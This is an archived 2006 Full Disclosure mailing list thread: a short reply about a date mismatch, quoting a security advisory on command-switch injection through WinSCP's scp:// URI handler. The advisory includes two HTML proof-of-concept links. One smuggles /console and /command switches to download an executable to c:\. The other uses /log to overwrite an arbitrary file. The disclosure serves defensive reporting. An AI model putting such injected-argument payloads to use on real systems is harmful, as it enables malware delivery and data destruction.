Full Disclosure mailing list archives

Re: WinSCP - URI Handler Command Switch Parsing

From: Juha-Matti Laurio <juha-matti.laurio () netti fi>
Date: Sun, 11 Jun 2006 16:37:01 +0300 (EEST)

Your e-mail has the following Date field:
Fri, 10 Mar 2006 21:24:12 +0100

My e-mail client says 'Sent: 10.3.2006 22:24:12' because of this.

Archive puts it to Jun 11th, however:
http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046810.html

- Juha-Matti

Jelmer Kuperus <jkuperus () planet nl> kirjoitti:


WinSCP - URI Handler Command Switch Parsing

About winscp :

WinSCP is an open source freeware SFTP client for Windows using SSH.
Legacy SCP protocol is also supported. Its main function is safe copying
of files between a local and a remote computer.

Versions affected :

It was tested on WinSCP 3.8.1 , previous versions may or may not be
affected

Description :

During a typical installation of winscp several URI handlers are
installed. (scp:// sftp://) It is possible to include additional command
line switches to be passed to winscp

Some of these switches may initiate  a file transfer, sending a
specified file to an arbitrary ftp. or they may download executables to
a location on a pc where they would be executed. eg. the startup folder

If you create an html page with these contents

<a href="scp://user:password@host:22/%22%20/console%20/command%20%22lcd%
20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a>

And click on the link it would automatically download malware.exe to a
c:\ (asuming the host is in the cache otherwise user interaction is
required)

clicking on

<a href="scp://jelmer@127.0.0.1:22/%22%20%22/log=c:%5csomefile%
22"log</a>

would append log output to c:\somefile possibly rendering the file
unusable in the process. Note that this also works when the host is not
in the cache

Vendor status :

Martin Prikryl was notified June 04, 2006, He will "think about a
solution"



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

WinSCP - URI Handler Command Switch Parsing Jelmer Kuperus (Jun 11)
- <Possible follow-ups>
- Re: WinSCP - URI Handler Command Switch Parsing Juha-Matti Laurio (Jun 11)